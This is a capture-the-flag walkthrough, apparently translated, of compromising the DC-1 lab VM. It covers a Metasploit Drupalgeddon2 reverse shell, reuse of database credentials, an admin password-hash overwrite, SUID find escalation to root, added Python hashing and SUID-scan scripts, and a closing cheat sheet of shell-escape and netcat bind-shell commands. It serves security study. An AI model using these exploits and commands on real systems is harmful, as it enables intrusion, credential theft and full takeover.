DC-1
kali: 192.168.32.135
target: 192.168.32.140
arp-scan -l
finds the target's IP on the local segment; then scan every TCP port with service detection: nmap -sV -p- 192.168.32.140
root@kali:~# nmap -sV -p- 192.168.32.140
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 09:36 EDT
Nmap scan report for 192.168.32.140
Host is up (0.00064s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
52962/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:03:D1:4E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/su
Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds
There is a web service. Visiting it and fingerprinting it with 云悉 gives:
Content management system (CMS): Drupal 7
Web server: Apache 2.2.22
Programming language: PHP 5.4.45
Operating system: Debian
JavaScript library: jQuery 1.4.4
MSF to the rescue! Searching for Drupal modules directly turns up eight (indices 0 to 7). A newer one is the safer bet, and the 2018 Drupalgeddon 2 module (CVE-2018-7600, which affects Drupal 7.x before 7.58) fits the Drupal 7 found here.
msf5 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index, for example use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.32.135 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.32.140
rhost => 192.168.32.140
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.32.135:4444
[*] Sending stage (38288 bytes) to 192.168.32.140
[*] Meterpreter session 1 opened (192.168.32.135:4444 -> 192.168.32.140:58870) at 2020-07-28 09:15:03 -0400
The meterpreter > prompt means the shell came back. From meterpreter, shell drops into a plain command shell; running python -c 'import pty;pty.spawn("/bin/bash")' there gives an interactive terminal. Next, look at the files in the current directory.
www-data@DC-1:/var/www$ ls
ls
COPYRIGHT.txt LICENSE.txt cron.php misc sites
INSTALL.mysql.txt MAINTAINERS.txt flag1.txt modules themes
INSTALL.pgsql.txt README.txt includes profiles update.php
INSTALL.sqlite.txt UPGRADE.txt index.php robots.txt web.config
INSTALL.txt authorize.php install.php scripts xmlrpc.php
There is a flag1.txt; cat it.
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
Flag 1 tells me to look for a config file, and one that belongs to the CMS. The never-changing lazy trick is find; along the way I learned that Drupal's default settings file is called settings.php.
www-data@DC-1:/var/www$ find -name 'settings.php'
find -name 'settings.php'
./sites/default/settings.php
www-data@DC-1:/var/www$ cat ./sites/default/settings.php
cat ./sites/default/settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
......
This is flag2. Translated: brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access); what can you do with these credentials? The same file holds the database connection details, including a low-privilege database account (dbuser / R0ck3t).
www-data@DC-1:/var/www$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t
Once logged in, before even thinking about privilege escalation, I first want to do something I have always wanted to do but never dared: dump the whole database (脱裤). (Skipped here.)
// take a look at the databases
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| ...... |
| users |
| ...... |
+-----------------------------+
80 rows in set (0.00 sec)
The database has a large number of tables; look at the users table first (only the interesting columns are shown below).
mysql> select * from users;
select * from users;
uid | name  | pass
----+-------+---------------------------------------------------------
  0 |       |
  1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
  2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
The table holds two accounts, which should be the Drupal site accounts, but the passwords are stored as Drupal 7 $S$ hashes (salted, iterated SHA-512), so they cannot be read back. After reading other people's writeups I learned that Drupal's own hashing script can produce a new hash, which can then be written over the stored one. The steps:
www-data@DC-1:/var/www$ cd scripts
cd scripts
www-data@DC-1:/var/www/scripts$ cp -r ../includes ./
cp -r ../includes ./
www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh drupal.sh generate-d6-content.sh password-hash.sh
cron-curl.sh dump-database-d6.sh generate-d7-content.sh run-tests.sh
cron-lynx.sh dump-database-d7.sh includes test.script
www-data@DC-1:/var/www/scripts$ ./password-hash.sh Tr0jAn
./password-hash.sh Tr0jAn
password: Tr0jAn hash: $S$DVhpAVWFG6k2HYLGwWnwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5
That gives the hash for Tr0jAn; now update the password in the database:
mysql> update users set pass = '$S$DVhpAVWFG6k2HYLGwWnwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5' where name = 'admin';
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
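The hash that password-hash.sh printed is Drupal 7's $S$ scheme: a random 6-byte salt, SHA-512 iterated 2^15 times (the 'D' in the fourth position encodes the exponent), Drupal's own base64 alphabet, and truncation to 55 characters. The following is an added Python reimplementation of Drupal 7's user_hash_password() and user_check_password(); it is my code, not code from this writeup or from the Drupal project, whose scripts/password-hash.sh remains the authoritative tool. It lets you generate a replacement hash for the UPDATE above, or check a guessed password against a dumped hash, without a Drupal tree. The only fixed input is the hash the page obtained for Tr0jAn.

```python
"""Drupal 7 password hashing ($S$ scheme), reimplemented in Python.

Generates the same kind of hash as scripts/password-hash.sh and checks a
password against a stored hash the way user_check_password() does.
"""
import hashlib
import math
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55      # DRUPAL_HASH_LENGTH: stored hashes are truncated to this
DEFAULT_LOG2 = 15     # DRUPAL_HASH_COUNT: 2**15 rounds
MIN_LOG2, MAX_LOG2 = 7, 30


def _b64(data: bytes, count: int) -> str:
    """Drupal's phpass-style base64: 3 bytes -> 4 chars, custom alphabet, no padding."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def _crypt(algo: str, password: str, setting: str):
    """Port of _password_crypt(): setting is '$S$' + cost char + 8-char salt."""
    if len(password) > 512:
        return None
    setting = setting[:12]
    if len(setting) < 12 or setting[0] != "$" or setting[2] != "$":
        return None
    log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        return None
    salt = setting[4:12]
    pw = password.encode()
    h = hashlib.new(algo, salt.encode() + pw).digest()
    for _ in range(1 << log2):            # PHP: do { ... } while (--$count)
        h = hashlib.new(algo, h + pw).digest()
    out = setting + _b64(h, len(h))
    expected = 12 + math.ceil(8 * len(h) / 6)
    return out[:HASH_LENGTH] if len(out) == expected else None


def hash_password(password: str, log2: int = DEFAULT_LOG2) -> str:
    """user_hash_password(): fresh 6-byte random salt, SHA-512, 2**log2 rounds."""
    log2 = max(MIN_LOG2, min(MAX_LOG2, log2))
    setting = "$S$" + ITOA64[log2] + _b64(os.urandom(6), 6)
    return _crypt("sha512", password, setting)


def check_password(password: str, stored: str) -> bool:
    """user_check_password(): recompute with the stored salt and cost, then compare."""
    if stored.startswith("U$"):           # Drupal 6 md5 hash re-hashed on upgrade
        stored = stored[1:]
        password = hashlib.md5(password.encode()).hexdigest()
    prefix = stored[:3]
    if prefix == "$S$":
        computed = _crypt("sha512", password, stored)
    elif prefix in ("$H$", "$P$"):        # plain phpass md5 hashes are also accepted
        computed = _crypt("md5", password, stored)
    else:
        return False
    return computed is not None and computed == stored


def iterations(stored: str) -> int:
    """Work factor encoded in the 4th character, e.g. 'D' -> 2**15."""
    return 1 << ITOA64.find(stored[3])


if __name__ == "__main__":
    # The hash password-hash.sh printed on this page for 'Tr0jAn'.
    page_hash = "$S$DVhpAVWFG6k2HYLGwWnwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5"
    print(check_password("Tr0jAn", page_hash), iterations(page_hash))
    print(hash_password("Tr0jAn"))       # a new hash with a fresh salt
```

The cost lives inside the hash, so every candidate costs 32768 SHA-512 rounds; that is why flag2 points the other way: with write access to the users table you do not crack the admin hash, you replace it.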
Now log back in to the site as admin with the new password.
On the Dashboard there is flag3, which reads:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
Roughly, it is telling me how to find the password, but I need exec and shadow (confused face). The capitalised words are the hint: special PERMissions on the FIND binary, used with its -exec option, will get at what /etc/shadow holds.
(Again after reading others' writeups.) First cat the password file and take a look:
www-data@DC-1:/var/www$ cat /etc/passwd
......
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
There is a flag4 user; go to that home directory and look at flag4.
www-data@DC-1:/var/www$ cd /home/flag4
cd /home/flag4
www-data@DC-1:/home/flag4$ ls
ls
flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
That is a reminder to escalate privileges; the exciting moment has finally arrived.
SUID privilege escalation: find -exec
SUID (set-user-ID) is a permission bit that appears in the execute position of the owner's permissions. When a file carrying it is executed, the process runs with the effective uid of the file's owner rather than of the caller, for as long as it runs.
Common Linux executables that can be abused for escalation when they carry SUID (or are allowed through sudo) include nmap, vim, find, bash, more, less, nano and cp.
find can list every SUID executable on the system. What we actually want are files that have the SUID bit set and are owned by root; stderr is redirected to /dev/null so that the "Permission denied" noise from directories we cannot enter is dropped and only the files we are able to stat are listed:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
/ start at the top of the filesystem (root) and descend into every directory
-perm match on the permission bits that follow
-u=s the set-user-ID bit is set (this says nothing about who owns the file; -user root is what restricts to root-owned files)
-4000 the same bit in octal; the leading - means "at least these bits"
-type the kind of filesystem object we are looking for
f regular files only, not directories or special files
2 file descriptor 2 of the process, i.e. stderr (standard error)
> redirect
/dev/null a special file that discards everything written to it
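The same enumeration done in Python, as an added example that is not part of this writeup: it walks a tree the way the find one-liner does (regular files only, symlinks not followed, unreadable directories skipped silently, which is what the 2>/dev/null hides) and then ranks the hits so that root-owned setuid binaries with a known shell-escape land at the top. The KNOWN_ESCALATORS list is my triage hint list, not a complete GTFOBins mirror, and build_demo_tree() constructs a throwaway directory so the scan can be exercised offline without touching /.

```python
"""Enumerate setuid/setgid files and rank the ones worth trying first.

Python equivalent of   find / -perm -u=s -type f 2>/dev/null   with a triage
step on top: setuid binaries whose name is on a known-escalation list
(find, vim, bash, ...) come first in the output.
"""
import os
import stat
import sys
import tempfile
from dataclasses import dataclass
from typing import Iterator, List

# Names that hand out a shell or arbitrary file access when setuid root.
# Assumption: a triage hint list (the writeup's list plus the usual suspects),
# not a complete GTFOBins mirror.
KNOWN_ESCALATORS = frozenset({
    "find", "vim", "vim.tiny", "bash", "sh", "dash", "more", "less", "nano",
    "cp", "mv", "awk", "gawk", "python", "python2", "python3", "perl", "ruby",
    "lua", "nmap", "man", "env", "xargs", "tcpdump",
})


@dataclass
class SuidHit:
    path: str
    name: str
    uid: int
    gid: int
    setuid: bool
    setgid: bool

    @property
    def known(self) -> bool:
        return self.name in KNOWN_ESCALATORS

    @property
    def root_setuid(self) -> bool:
        return self.setuid and self.uid == 0


def walk_suid(root: str) -> Iterator[SuidHit]:
    """Yield regular files under root that carry the setuid or setgid bit.

    Directories we cannot read are skipped (os.walk's onerror swallows the
    error), and symlinks are not followed, matching find's default behaviour.
    """
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            setuid = bool(st.st_mode & stat.S_ISUID)
            setgid = bool(st.st_mode & stat.S_ISGID)
            if setuid or setgid:
                yield SuidHit(path, name, st.st_uid, st.st_gid, setuid, setgid)


def triage(root: str) -> List[SuidHit]:
    """Known escalators first, then other root-owned setuid files, then the rest."""
    hits = list(walk_suid(root))
    hits.sort(key=lambda h: (not h.known, not h.root_setuid, h.path))
    return hits


def build_demo_tree() -> str:
    """Constructed fixture: a throwaway bin/ with a setuid find and ping plus a
    plain file. Setting the setuid bit on a file you own needs no privileges."""
    base = tempfile.mkdtemp(prefix="suid-demo-")
    os.mkdir(os.path.join(base, "bin"))
    for name, mode in (("find", 0o4755), ("ping", 0o4755), ("README", 0o644)):
        path = os.path.join(base, "bin", name)
        open(path, "w").close()
        os.chmod(path, mode)
    return base


if __name__ == "__main__":
    # Pass a real root (e.g. /) to scan a live box; with no argument the demo tree is used.
    root = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for h in triage(root):
        tag = "CHECK" if h.known else "     "
        bits = ("s" if h.setuid else "-") + ("s" if h.setgid else "-")
        print(f"{tag} {bits} uid={h.uid:<5} {h.path}")
```

On the DC-1 listing below this would put /usr/bin/find at the top, which is exactly the binary the flag3 hint points at; everything else in that list is a stock Debian setuid helper.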
www-data@DC-1:/$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
find is in the list, so abuse it to escalate. Each -exec runs /bin/sh with the effective uid of find's owner, root. On this Debian 7 box /bin/sh is dash, which does not drop the effective uid; if /bin/sh were bash it would need -p to keep it. (The second start path Tr0jAn does not exist and is just the author's tag; apart from an error message find ignores it and still runs the action for the entries under ./.)
www-data@DC-1:/$ find ./ Tr0jAn -exec '/bin/sh' \;
# whoami
whoami
root
# find / -name '*flag*.txt'
find / -name '*flag*.txt'
/home/flag4/flag4.txt
/var/www/flag1.txt
/root/thefinalflag.txt
# cat /root/thefinalflag.txt
cat /root/thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
That completes the DC-1 attack. In a real engagement, though, after the MSF one-shot we should upgrade the shell into something more stable (a full tty, or a proper backdoor) so that it is not killed from under us.
Common SUID privilege-escalation commands
I covered what SUID is in another article; reread it if you have forgotten.
The find command for locating files with the SUID bit was shown above and is not repeated here. Entries marked (sudo) rely on a sudo rule for that binary rather than on the SUID bit. Note that a SUID bash (or a bash started from a SUID interpreter) drops the effective uid unless it is started with -p; /bin/sh on Debian is dash and does not.
vim
vim.tiny
#Press ESC key
:set shell=/bin/sh
:shell
find
find . -exec /bin/sh \; -quit
find + netcat (bind shell on the target, then connect from the attacker box)
find . -exec netcat -lvp [Port] -e /bin/sh \; -quit
netcat <ip> <port>
bash
bash -p
less
less /etc/passwd
!/bin/sh
more
more /etc/passwd
!/bin/sh
ash or any other shell (sudo)
sudo ash
awk
awk 'BEGIN {system("/bin/bash")}'
man
man passwd
!/bin/bash
python
python -c 'import os; os.system("/bin/bash")'
perl, ruby, lua, etc.
perl -e 'exec "/bin/bash";'
ruby -e 'exec "/bin/bash"'
lua -e 'os.execute("/bin/bash")'
tcpdump (sudo; -z runs the given script on rotation as the -Z user)
echo $'id\ncat /etc/shadow' > /tmp/.Tr0jAn
chmod +x /tmp/.Tr0jAn
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.Tr0jAn -Z root
cp (sudo)
sudo sh -c 'cp $(which cp) .; chmod +s ./cp'
chmod (sudo)
sudo sh -c 'cp $(which chmod) .; chmod +s ./chmod'